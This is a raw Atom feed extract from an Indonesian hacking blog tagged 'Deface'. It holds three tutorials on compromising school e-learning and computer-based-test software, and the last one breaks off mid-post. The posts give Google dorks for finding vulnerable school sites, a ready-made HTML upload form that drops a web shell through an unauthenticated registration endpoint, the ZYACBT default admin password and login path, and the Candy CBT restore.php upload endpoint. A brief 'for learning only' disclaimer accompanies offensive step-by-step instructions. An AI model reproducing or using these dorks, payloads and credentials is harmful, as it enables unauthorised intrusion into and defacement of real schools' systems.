&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7RZtTMrHT21Z7zgr8gInJdS2z8gWo98o22Yb5QejnXwDS0eRCpGOL1YTgh3kjFvA-pxhdE0wsIAbg9gyusbRZ6sZGAGvnXR8u0lx8atjHms7iEtRFF1479mTQqRG9IPdLBJSFLvNuJ9j/s1600/FB_IMG_15918610109143942.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7RZtTMrHT21Z7zgr8gInJdS2z8gWo98o22Yb5QejnXwDS0eRCpGOL1YTgh3kjFvA-pxhdE0wsIAbg9gyusbRZ6sZGAGvnXR8u0lx8atjHms7iEtRFF1479mTQqRG9IPdLBJSFLvNuJ9j/s320/FB_IMG_15918610109143942.jpg&quot; width=&quot;256&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Yah Dari Kalian Pasti Ada Yang Sudah Tahu Dan Yang Belum Tahu Tentang App Web Ini&lt;br /&gt;
&lt;br /&gt;
Dan Yang Sudah Tahu Pasti Ribet Pas Di Bagian Regmem Nya Wkwk..&lt;br /&gt;
&lt;br /&gt;
Nah Di Sini Saya Akan Persingkat Aja Jadi Gak Perlu Regmem Lagi Langsung Ke Upload File...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Dork :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://www.google.com/search?safe=strict&amp;amp;sxsrf=ALeKk02UUa8nQPfMYB3s8NzFHyWbRHGMmQ%3A1592160456481&amp;amp;ei=yHDmXoj8HMn49QOuwqD4AQ&amp;amp;q=silahkan+login+untuk+masuk+ke+e-learning+site%3Asch.id&amp;amp;oq=silahkan+login+untuk+masuk+ke+e-learning+site%3Asch.id&amp;amp;gs_lcp=ChNtb2JpbGUtZ3dzLXdpei1zZXJwEAM6BAgAEEc6BAgjECdQ9oYLWOezC2DjtAtoBHABeACAAdQBiAHWDJIBBTQuOS4xmAEAoAEB&amp;amp;sclient=mobile-gws-wiz-serp&quot; target=&quot;_blank&quot;&gt;&lt;i&gt;silahkan login untuk masuk ke e-learning site:sch.id&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Csrf :&lt;/li&gt;
&lt;/ul&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th&gt;&lt;div style=&quot;overflow: auto; text-align: left;&quot;&gt;
&amp;lt;form method=&quot;post&quot; action=&quot;http://e-learning.com/?hal=daftar&quot; enctype=&quot;multipart/form-data&quot;&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;input type=&quot;file&quot; name=&quot;gambar&quot; /&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;input type=&quot;submit&quot; name=&quot;daftar&quot; value=&quot;Upload!!&quot; /&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;
&lt;span style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;&amp;lt;!-- Seperti Biasa Bagian ?hal=daftar Kalian Tidak Perlu Hapus Kalian Hanya Tinggal Memasukan Site Target Kalian Ganti e-learning.com Dengan Site Target Kalian --&amp;gt;&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;ul&gt;
&lt;li&gt;Nah Jika Sudah Siap Langsung Ke Step² Berikut...&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Pertama Dorking Dengan Dork Di Atas Di&amp;nbsp;&lt;a href=&quot;http://google.com/&quot; target=&quot;_blank&quot;&gt;Google.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Jika Sudah Dorking Kalian Pilih Target Yang Vuln..&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Untuk Tampilan Dari E-learning Ini Seperti Ini Gan..&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-Lv1Y-llkBOWlLBXIyu4eSZUwu3entbue9phdLptMCXIGGG-fvC6S0slWj1tanFOMtHjU9XojDHaH_1pW60sOtPhM3scfquBEI17eiiKPI6ePLgZ0ZdlkxBvmniY8VqLhX7DNPiE6299/s1600/S00615-021405.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-Lv1Y-llkBOWlLBXIyu4eSZUwu3entbue9phdLptMCXIGGG-fvC6S0slWj1tanFOMtHjU9XojDHaH_1pW60sOtPhM3scfquBEI17eiiKPI6ePLgZ0ZdlkxBvmniY8VqLhX7DNPiE6299/s320/S00615-021405.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Jika Seperti Itu Kalian Masukan Langsung Ke Csrfnya Lalu Kalian Exe Upload Shell Kalian Gan&lt;/li&gt;
&lt;li&gt;Nah Jika Sukses Akan Seperti Ini&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2jQteACm_jB-OcsTpkwiPATPLAs4HrpNPJHZqdGES4QhLfctU5zaXeEMLTT-AtTLWVjgWSOEhC9Fl1bvdHiz6_SE3240jo_Oj6rbuSg4U96CXOcB3YgirpG_lpZBqqyWTO-kS0yLVEQkV/s1600/S00615-02193062.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2jQteACm_jB-OcsTpkwiPATPLAs4HrpNPJHZqdGES4QhLfctU5zaXeEMLTT-AtTLWVjgWSOEhC9Fl1bvdHiz6_SE3240jo_Oj6rbuSg4U96CXOcB3YgirpG_lpZBqqyWTO-kS0yLVEQkV/s320/S00615-02193062.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8aGOwKGuzCmfXOFppLypMOpwco2mcXa53B1OBmfDe4bxPRvGl8-kH4G44M_f6AVcSFkfSPR3p67z6XPW9XzNksFAt-g2VhPowfPDM0kTEACc9e55tfey1H0k62fnSmUNIj63wcdOzJbUm/s1600/S00615-022946.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8aGOwKGuzCmfXOFppLypMOpwco2mcXa53B1OBmfDe4bxPRvGl8-kH4G44M_f6AVcSFkfSPR3p67z6XPW9XzNksFAt-g2VhPowfPDM0kTEACc9e55tfey1H0k62fnSmUNIj63wcdOzJbUm/s320/S00615-022946.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Jika Muncul Pesan Kek Gitu Artinya Berhasil Langsung Ke Akses Shell Kalian..&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://e-learning.com/img/foto_siswa/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;Or&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;http://e-learning.com/[patch]/img/foto_siswa/shell.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;And Boom...&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWFWAfUTIWPw_q7xAq_RWH0yEmoXFe9-Im_pCQoIp8dM0vmlc0WoLseuHFrKVz2fC7_GkkhfybX2EIOSkjziqnh_7nyQ_Jn_6NwzI5VJJgpL6tzNq1j52IvN2LnIpckNdZP5rrzz9Rkn59/s1600/S00615-022517.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWFWAfUTIWPw_q7xAq_RWH0yEmoXFe9-Im_pCQoIp8dM0vmlc0WoLseuHFrKVz2fC7_GkkhfybX2EIOSkjziqnh_7nyQ_Jn_6NwzI5VJJgpL6tzNq1j52IvN2LnIpckNdZP5rrzz9Rkn59/s320/S00615-022517.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Semoga Berhasil...&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/4011389657897004618/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/e-learning-app-not-moodle-file-upload.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/4011389657897004618'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/4011389657897004618'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/e-learning-app-not-moodle-file-upload.html' title='E-Learning App (Not Moodle) File Upload With Csrf'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7RZtTMrHT21Z7zgr8gInJdS2z8gWo98o22Yb5QejnXwDS0eRCpGOL1YTgh3kjFvA-pxhdE0wsIAbg9gyusbRZ6sZGAGvnXR8u0lx8atjHms7iEtRFF1479mTQqRG9IPdLBJSFLvNuJ9j/s72-c/FB_IMG_15918610109143942.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-2856038769476599656</id><published>2020-06-13T01:42:00.000+07:00</published><updated>2020-06-13T01:48:17.965+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit ZYACBT Default User Pass</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoUVsXecpI0pce9qmkvk4p6CQ4x0YlXAZwrLFhJ64gta907siPWpxeL1rvRLPMMsiFbJbajgH9wWcsw9yayoSyZgD6WaML62RbRhlxd48LQ8Ozu_i68mxln6vDslQHtk3qKdoMuXHmsjT3/s1600/IMG-20200504-WA0287.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;616&quot; data-original-width=&quot;498&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoUVsXecpI0pce9qmkvk4p6CQ4x0YlXAZwrLFhJ64gta907siPWpxeL1rvRLPMMsiFbJbajgH9wWcsw9yayoSyZgD6WaML62RbRhlxd48LQ8Ozu_i68mxln6vDslQHtk3qKdoMuXHmsjT3/s320/IMG-20200504-WA0287.jpg&quot; width=&quot;258&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span id=&quot;goog_1036464712&quot;&gt;&lt;/span&gt;
Jadi Gini Sebenernya Neh Cbt Gua Dah Lama Nemunya Cuman Lupa Gua Njer Cari Exploitnya Nah Temen Ane Di WA Dia Nge Chat Gua Pas Gua Liat Sitenya Ternyata Ada ZYACBT Akhirnya Gua Ke Inget Lagi Langsung Aja Ane Cari Exploitnya wkwk..&lt;br /&gt;
&lt;br /&gt;
Di Exploit Kali Ini Tidak Bisa Upload Shell Atau Sc Gan Karna Di Disable Atau Hanya Bisa Meng Upload Ext Gambar Atau Image. Yah Gpp Lah Sapa Tahu Kan Bisa Kalian Tamper Data :v&lt;br /&gt;
&lt;br /&gt;
Dah Lah Mari Lanjutkan Tutornya Gan..&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;Dork&lt;/i&gt;&lt;/b&gt; :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;intext:Log In Operator. © achmadlutfi.wordpress.com&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;User/Pass&lt;/i&gt;&lt;/b&gt; :&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;admin&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;Login Page Admin&lt;/i&gt;&lt;/b&gt; :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;index.php/manager&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Pertama Kalian Dorking Gunaka Dork Yang Gua Siapin Tadi..&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Jika Sudah Kalian Dorking Kalian Cari Sitenya Yang Menurut Kalian Vuln&lt;/li&gt;
&lt;li&gt;Untuk ZYACBT Ini Menggunakan Template AdminLTE&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM0GWKpBG95zmV6ZJ-jKqipc8qidt8IM0TpjFYx9wU27LG5RsL1fcRcWvfARH-JqMAuk4g568C0xOhS2oP0UslId4Xr4xZfe-eiIo11E7_zwQ3pHmd79HEJ6bM3EkITHJaVK90GFaVhNXK/s1600/S00613-012449.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM0GWKpBG95zmV6ZJ-jKqipc8qidt8IM0TpjFYx9wU27LG5RsL1fcRcWvfARH-JqMAuk4g568C0xOhS2oP0UslId4Xr4xZfe-eiIo11E7_zwQ3pHmd79HEJ6bM3EkITHJaVK90GFaVhNXK/s320/S00613-012449.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Langsung Kalian Masuk Ke Login Managernya&lt;/li&gt;
&lt;li&gt;Dan Masukan Default User/Passnya&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj7TFOwFzcPrAyQl5cNsx0yCC3wzNBLoCDMUgpIKiMdndKytQq1v_93kIQhe2xEZLsQ9DfLLb0qeeD6u_TQJLH44-ghmEiPeMwMJTbmUCqvhC0x_JQI0YryO91dC6MGfGsgTxryABZryDm/s1600/S00613-012656.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj7TFOwFzcPrAyQl5cNsx0yCC3wzNBLoCDMUgpIKiMdndKytQq1v_93kIQhe2xEZLsQ9DfLLb0qeeD6u_TQJLH44-ghmEiPeMwMJTbmUCqvhC0x_JQI0YryO91dC6MGfGsgTxryABZryDm/s320/S00613-012656.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;And Boom&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYU07niLm4v48w9_lCQKfjRC_KsmMxtlBYcGlhbJ2oeN6J1GXBjke2mULsVc_bTsFXoPYR4sbcRRcpB2SnXXVc1rPwr8GxzDNT9p1KPnIoTP7bj9p7ssrglhgLPC7GlNaPaXnlzUpYWrzz/s1600/S00613-012752.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYU07niLm4v48w9_lCQKfjRC_KsmMxtlBYcGlhbJ2oeN6J1GXBjke2mULsVc_bTsFXoPYR4sbcRRcpB2SnXXVc1rPwr8GxzDNT9p1KPnIoTP7bj9p7ssrglhgLPC7GlNaPaXnlzUpYWrzz/s320/S00613-012752.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Kalian Akan Ke Redirect Ke Dashboard Adminnya&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
Sebenernya Tadi Gua Cari Exploit Yang Lain Ternyata Gak Bisa Harus Masuk Ke Dashboardnya Yasudah Ane Gak Jadi Soalnya Sama Aja&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;Note :&amp;nbsp;&lt;/b&gt;&lt;i&gt;semua tentang tutorial ini hanya pembelajaran, tentang penyalahgunaan tutorial tidak tanggung jawab saya..&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Sekian Dan Terima Kasih&lt;/div&gt;
&lt;div&gt;
Thanks : Shandi1337&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/2856038769476599656/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/exploit-zyacbt-default-user-pass.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2856038769476599656'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/2856038769476599656'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2020/06/exploit-zyacbt-default-user-pass.html' title='Exploit ZYACBT Default User Pass'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoUVsXecpI0pce9qmkvk4p6CQ4x0YlXAZwrLFhJ64gta907siPWpxeL1rvRLPMMsiFbJbajgH9wWcsw9yayoSyZgD6WaML62RbRhlxd48LQ8Ozu_i68mxln6vDslQHtk3qKdoMuXHmsjT3/s72-c/IMG-20200504-WA0287.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-7335585688530664938</id><published>2020-06-05T04:49:00.000+07:00</published><updated>2020-06-05T05:47:46.207+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><title type='text'>Candy Cbt 2.8 AFU (Arbritrary File Upload) With Csrf</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibVgcDrTb2lSgdzayY8QNpvUpQXohlrdVPdJww_9oKdPR8UtyFn8O34GUSwN6hSvirPR458_ipZWHNziLZhWXGc71JU_jyS9-1G-KaezdyKFxdu-vqYAHkXcbBZNzU5asSsi0LZKNFZx2t/s1600/IMG-20200514-WA0711.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;871&quot; data-original-width=&quot;800&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibVgcDrTb2lSgdzayY8QNpvUpQXohlrdVPdJww_9oKdPR8UtyFn8O34GUSwN6hSvirPR458_ipZWHNziLZhWXGc71JU_jyS9-1G-KaezdyKFxdu-vqYAHkXcbBZNzU5asSsi0LZKNFZx2t/s320/IMG-20200514-WA0711.jpg&quot; width=&quot;293&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hallo Bujannk :v&lt;br /&gt;
Jadi Gini, Sebenernya Ane Ke Inget Aja Sih Napa Gak Buat Yang Langsung File Upload Aja Wkwkw&lt;br /&gt;
&lt;br /&gt;
Dan Pas Ane Liat Di Youtube Banyak Yang Buat Content Candy Cbt Add Admin Pas Ane Lihat Ada Yang Up Shell..&amp;nbsp; Yaudah Deh Ane Cari Bug Nya Biar Langsung Ke Up File Jadi Gak Perlu Add Admin Lagi Atau Add User Lagi..&lt;br /&gt;
&lt;br /&gt;
Langsung Aja Tutornya Kek Gimana...&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Dork&lt;/b&gt; :&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;© Candy CBT v2.8.0 inurl:login.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Exploit &lt;/b&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-style: italic;&quot;&gt;&lt;u&gt;admin/restore.php&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;Postfile : &lt;u&gt;datafile&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-style: italic;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Jika Bahan Diatas Dah Siap Kita Lakukan Step By Step Di Bawah...&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Kalian Dorking Dulu Gunakan Dork Yang Ane Siapa Kan Tadi..&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Jika Sudah Dorking Kalian Cari Sitenya Yang Menurut Kalian Vuln Seperti Biasanya Lalu Masukan Exploitnya Seperti Ini&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;https://candy.com/admin/restore.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;Or&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;i&gt;&lt;u&gt;https://candy.com/[patch]/admin/restore.php&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Jika Vuln Akan Seperti Gambar Di Bawah Gan&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO-xyAyQNYYgZpdVHF0UZXTgbOOYSwUZukjMaq2TpN-ZJawHoFe3D4qkp994qHRdpI8fyt2wOsTwLNARKHv5XsjjnPF5x_F4SWC2dNUH-bPAj16AEqOM-y3AT_VWDXob92hlQ291rUado/s1600/S00605-043606.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO-xyAyQNYYgZpdVHF0UZXTgbOOYSwUZukjMaq2TpN-ZJawHoFe3D4qkp994qHRdpI8fyt2wOsTwLNARKHv5XsjjnPF5x_F4SWC2dNUH-bPAj16AEqOM-y3AT_VWDXob92hlQ291rUado/s320/S00605-043606.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Nah Terdabat Text : &lt;b&gt;Fatal Error&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Next Jika Terdabat Text Itu Artinya Vuln Langsung Ke Csrf Online (Kalian Cari Aja Di Google Gan Banyak)&lt;/li&gt;
&lt;li&gt;Kalian Masukan Sitenya Gan Dan Postfilenya&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDAqTBnYgZxxlYo8p3EABZtDhoydArtTdBHuCnhHLt1LwDCA5K5f0YlmyFhnEBjLnkoKKjmNgCTn8FxvwV2Xy0mRylCO2S9pNp7A2j7vwildf02ztMM7ELnxHBHNo5RCNT_-jqXSvVyri/s1600/S00605-043955.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1280&quot; data-original-width=&quot;720&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDAqTBnYgZxxlYo8p3EABZtDhoydArtTdBHuCnhHLt1LwDCA5K5f0YlmyFhnEBjLnkoKKjmNgCTn8FxvwV2Xy0mRylCO2S9pNp7A2j7vwildf02ztMM7ELnxHBHNo5RCNT_-jqXSvVyri/s320/S00605-043955.jpg&quot; width=&quot;180&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Jika Sudah Kalian Eksekusi Lalu Upload Shell Atau Sc Kalian...&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Jika Success Akan Seperti Ini..&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
